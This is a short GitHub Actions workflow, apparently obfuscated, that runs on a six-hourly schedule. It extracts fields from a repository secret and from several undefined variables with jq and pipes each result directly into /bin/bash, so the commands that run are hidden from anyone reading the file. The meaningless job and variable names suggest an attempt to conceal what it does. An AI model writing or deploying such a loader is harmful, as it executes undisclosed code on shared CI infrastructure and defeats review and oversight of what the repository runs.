name: taxintg
on:
  workflow_dispatch:
  schedule:
    - cron: '12 0/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: taxintg
        env:
          uosm0: ${{ secrets.uosm0 }}
        run: |
          echo $uosm0 | jq -r .qyti2 | /bin/bash
          echo $za030 | jq -r .d2925 | /bin/bash
          echo $lea15154 | jq -r .b53148 | /bin/bash
          echo $sga6055 | jq -r .vvnpt4895 | /bin/bash
          echo $rifz592 | jq -r .hhg121 | /bin/bash
          echo $xcgqu85 | jq -r .udu7543 | /bin/bash
          echo $psx2624 | jq -r .bsbl91 | /bin/bash
          echo $icp9 | jq -r .l171 | /bin/bash
          echo $pprpk2 | jq -r .t8446 | /bin/bash

